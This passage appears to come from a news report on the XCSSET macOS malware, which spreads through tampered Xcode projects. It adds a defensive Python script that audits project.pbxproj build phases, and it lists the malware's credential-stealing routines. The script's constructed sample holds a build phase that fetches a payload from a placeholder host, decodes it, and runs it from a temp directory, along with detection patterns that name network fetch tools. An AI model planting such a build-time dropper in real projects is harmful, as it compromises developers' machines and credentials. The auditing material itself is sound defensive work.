"Presumably, these systems would be primarily used by developers," the team noted. "These Xcode projects have been modified such that upon building, these projects would run malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system."
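Because the infection vector described above is a modified Xcode project that runs code at build time, the practical check for a developer receiving a project from outside is to read its Run Script build phases before building. Xcode stores those phases in `project.pbxproj` as `PBXShellScriptBuildPhase` objects whose `shellScript` string runs on every build. The following script is an added example (not code from the article or from Trend Micro): it extracts every Run Script phase from a pbxproj and flags scripts that fetch from the network, decode an embedded payload, or drop and execute files from a temporary directory. The sample project text is constructed for the demo, the parser is a lightweight heuristic rather than a full OpenStep plist parser, and the indicator patterns are an assumed review heuristic, not a published XCSSET signature.

```python
"""Audit an Xcode project.pbxproj for Run Script build phases (added example)."""
import re

# Assumed review heuristics: patterns that warrant a manual look at a build-phase
# script. They are illustrative, not a signature for any specific malware.
SUSPICIOUS_PATTERNS = [
    (r"\b(curl|wget)\b", "downloads from the network at build time"),
    (r"base64\s+(-d|--decode|-D)\b", "decodes an embedded payload"),
    (r"\beval\b", "evaluates dynamically built commands"),
    (r"\bosascript\b", "runs AppleScript from the build"),
    (r"/tmp/|\$TMPDIR", "writes to or runs from a temp directory"),
    (r"\bchmod\s+\+x\b", "marks a dropped file executable"),
]

# A pbxproj object: <24-hex id> /* comment */ = { ... };
OBJECT_RE = re.compile(
    r"(?P<id>[0-9A-F]{24})\s*/\*(?P<comment>[^*]*)\*/\s*=\s*\{(?P<body>.*?)\};", re.S)
# The quoted shellScript value, allowing backslash-escaped quotes inside it.
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
NAME_RE = re.compile(r'\bname\s*=\s*"?([^";]*)"?\s*;')


def _unescape(s):
    """Undo the OpenStep-style escapes Xcode uses inside quoted strings."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def extract_run_script_phases(pbxproj_text):
    """Return (object_id, phase_name, script_text) for every Run Script phase."""
    phases = []
    for m in OBJECT_RE.finditer(pbxproj_text):
        body = m.group("body")
        if not re.search(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;", body):
            continue
        name_m = NAME_RE.search(body)
        script_m = SHELL_SCRIPT_RE.search(body)
        script = _unescape(script_m.group(1)) if script_m else ""
        phases.append((m.group("id"), name_m.group(1) if name_m else "", script))
    return phases


def review_script(script):
    """List the reasons a build-phase script deserves manual review (empty if none)."""
    return [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, script)]


def audit(pbxproj_text):
    """Map each Run Script phase id to its name, script and findings."""
    return {oid: {"name": name, "script": script, "findings": review_script(script)}
            for oid, name, script in extract_run_script_phases(pbxproj_text)}


# Constructed sample project: one ordinary lint phase and one phase that behaves
# like a build-time dropper. Ids and URL are placeholders, not real values.
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
	archiveVersion = 1;
	objectVersion = 50;
	objects = {
		A1B2C3D4E5F6A1B2C3D4E5F6 /* Run SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "Run SwiftLint";
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		B1B2C3D4E5F6B1B2C3D4E5F6 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			name = "ShellScript";
			shellPath = /bin/sh;
			shellScript = "curl -s https://placeholder.invalid/p | base64 -d > \"$TMPDIR/helper\"\nchmod +x \"$TMPDIR/helper\" && \"$TMPDIR/helper\"\n";
		};
		C1B2C3D4E5F6C1B2C3D4E5F6 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
		};
	};
	rootObject = D1B2C3D4E5F6D1B2C3D4E5F6 /* Project object */;
}
'''

if __name__ == "__main__":
    for oid, info in audit(SAMPLE_PBXPROJ).items():
        verdict = "REVIEW" if info["findings"] else "ok"
        print(f"{oid} [{info['name']}] {verdict}")
        for why in info["findings"]:
            print(f"    - {why}")
```

To run it against a real project, read `MyApp.xcodeproj/project.pbxproj` and pass the text to `audit()`. Any phase that comes back with findings should be read in full before the project is built, since the build phase runs with the developer's privileges the moment Xcode builds the target.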
Below is a summary of the routines we have identified:
• Manipulates browser results
• Manipulates and replaces found bitcoin and other cryptocurrency addresses
• Replaces the Chrome download link with a link to an old version package
• Steals Google, Yandex, Amocrm, SIPmarket, Paypal, and Apple ID credentials
• Steals credit card data linked in the Apple Store
• Prevents the user from changing their password but can also record the new password if it is changed
• Takes screenshots of certain accessed sites
You can read the paper here: https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf